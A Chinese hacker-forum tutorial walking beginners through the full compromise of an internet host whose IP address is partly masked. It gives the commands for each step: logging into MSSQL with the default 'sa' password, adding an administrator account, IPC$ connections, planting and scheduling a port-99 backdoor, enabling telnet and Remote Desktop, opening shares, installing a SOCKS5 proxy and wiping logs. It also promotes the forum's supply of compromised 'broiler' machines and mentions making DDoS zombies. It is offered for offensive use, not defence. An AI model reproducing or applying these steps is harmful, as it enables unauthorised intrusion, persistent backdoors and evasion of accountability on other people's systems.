****************************************** 影子鷹安全網絡 kawen Www.CnHacker.Cn Www.ChinaEHacker.Net 黑客培訓基地 安全服務中心 ******************************************
現在網上所有的教程,差不多都是本着一種漏洞來進入系統,然後展開一系列的權限提升呀,留後門等工作 其實在網上來看教程及學習的人,百分之九十都是正在成長的兄弟,他們需要一個較全面的入侵報道,以便明白其中的祕密和關聯,因此本文便產生了.沒什麼技術含量,主要面對初級用戶.高手就不用看了.:)
影子鷹安全網絡的技術論壇在每一天都會提供最新的肉雞和代理供大家使用和學習.本文中特提及的肉雞正來源於此.
注: 肉雞爲你已經得到權限的計算機 跳板則是在肉雞的基礎上被你做過內容,以方便自已的計算機
肉雞: 211.75.X.X 事情發現在一個深夜.外面黑的嚇死人,只有我的房間還亮着燈,我穿着一件黑色的大T 恤
按照網站論壇上的提示,211.75.X.X的USER爲administrato,PASSWD爲空,方式IPC連接
習慣性的先PING了一下該網站 C:/>ping 211.75.X.X Pinging iceblood.yofor.com [211.75.X.X] with 32 bytes of data: Reply from 211.75.X.X: bytes=32 time<10ms TTL=254 Reply from 211.75.X.X: bytes=32 time<10ms TTL=254 Reply from 211.75.X.X: bytes=32 time<10ms TTL=254 Reply from 211.75.X.X: bytes=32 time<10ms TTL=254 Ping statistics for 211.75.X.X: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),Approximate round trip times in milli-seconds: Minimum = 0ms, Maximum = 0ms, Average = 0ms
看來網站開通在,哪就按提示IPC連接吧
注: IPC$(Internet Process Connection)是共享"命名管道"的資源(大家都是這麼說的),它是爲了讓進程間通信而開放的命名管道,可以通過驗證用戶名和密碼獲得相應的權限,在遠程管理計算機和查看計算機的共享資源時使用。
C:/>net use //211.75.X.X/IPC$ "" /user:"admintitrators" 系統發生1326錯誤 登陸失敗:未知的用戶名或錯誤密碼
我暈,看來前來的兄弟將密碼改了,還是自已動手吧
流光出場,看看可以掃到點什麼有用的東東.十分鐘後,流光掃描報告顯示 PORT-> 主機 211.75.X.X 端口 0139 ...開放 PORT-> 主機 211.75.X.X 端口 0443 ...開放 PORT-> 主機 211.75.X.X 端口 080 ...開放 PORT-> 主機 211.75.X.X 端口 1433 ...開放 ......... 最下面探測到了流光的默認MSSQL密碼爲SA 哈哈,這回有的玩了 打開SuperSQLEXEC,在IP中填上211.75.X.X,在USER中輸入sa ,連接 稍等一會,出來了,我們現在利用了MSSQL的默認密碼這個漏洞進入倒對方的系統了 c:/net user admin administrator user aa bb lqh test xxxxx ldir like 看來這臺機子上有不少USER,反正也不差咱們一個了, c:/net user kawen kawen /add 命令成功 c:/net localgroup administrators kawen /add 命令成功 OK,我們現在已成功的將KAWEN這個用戶名加到管理員中去了. 退出SQL,我們現在又要轉到IPC這邊來了,打開DOS
C:/>net use //211.75.X.X/IPC$ "kawen" /user:"kawen" 命令完成
呵呵,看到沒有,我們已經和對方IPC上了
現在要做的就是提升權限了,當然你可以用DameWare Mini Remote Control直接通過圖形方式連上對方的計算機,就像3389一樣.
C:/>copy srv.exe //211.75.X.X/admin$ C:/>net time //211.75.X.X C:/>at //211.75.X.X 11:05 srv.exe
以上三步是我們要啓動可以打開99端口的後門軟件SRV.EXE C:/>net time //211.75.X.X 再查查到時間沒有?如果211.75.X.X 的當前時間是 2002/6/1 上午 11:05,那就準備開始下面的命令 C:/>telnet 211.75.X.X 99 C:/WINNT/system32 成功了,不過SRV是一次性的,下次登錄還要再激活!所以我們打算建立一個Telnet服務,也就是打開對方的23端口
copy ntlm.exe //211.75.X.X/admin$
OK,我們直接運行C:/WINNT/system32>ntlm 當出現"DONE"的時候,就說明已經啓動正常 然後我們使用net start telnet直接啓動TELNET服務 OK,現在我們已經利用IPC進來了 下一步就是開一個3389端口,可以以圖形方式直接登陸 請按以下步驟輸入開啓3389 c:/>query user c:/>echo [Components] > c:/kawen c:/>echo TSEnable = on >> c:/kawen //這是建立無人蔘與的安裝參數 c:/>sysocmgr /i:c:/winnt/inf/sysoc.inf /u:c:/kawen /q 如果沒有意外的話,幾分鐘計算機就會重啓, 我們就可以利用3389的客戶端連上去了 到這裏爲止我們通過MSSQL,IPC,99端口及TELNET後後又建立了3389端口,現在這臺計算機我們已基本控制了,現在還要做的就是建立一個代理服務器,以便我們可以在網上做到踏雪無痕, 代理服務器的首選應該是SkSockServer 怎麼上傳到我們控制的計算機中呢,其實有多種方法,我們不是開了對方的23端口了嗎 telnet上去 TELNET 211.75.X.X C:/WINNT/SYSTEM32/NET SHARE C$ 這一條命令是開對方的共享,然後在本機上的開始運行中直接鍵入//211.75.X.X就可以連上了,將SkSockServer拖到對方的C盤中就可以了.另外我們還可以利用流光的種植者直接種上去,也很簡單 明白了吧 傳上去後 c:/winnt/system32/sksockserver -install 開始安裝SKSOCKSERVER c:/winnt/system32/sksockserver -config starttype 2 c:/winnt/system32/sksockserver -config port 8888 c:/winnt/system32/net start skserver 這樣我們就開啓了一個端口爲8888的SOCK5代理服務器,放在你的QQ上用吧
現在算來,該做的也差不多了,是到要走的時候了,清掃一下吧 這一步在這裏比較簡單了,推薦使用SSSO-Friend,一款圖形界面的軟件,他會幫你清掉你的PP,很簡單 要的話聯繫我吧或是到down.chinaehacker.net下載
到這裏教程也完了 總結一下,我們用了SQL,IPC,共享,開了99端口,23端口,3389端口,最後還做了一個SOCK5的代理服務器.其實運用上面的手法,你還可以做TFTP服務器,做成用於DDOS攻擊的傀儡機器等等.沒什麼技術含量,只是想告訴各位一個最簡單的道理,多看書,多運用,將本身不相關的東西相連起來,就會成爲一個完整的圓. |
|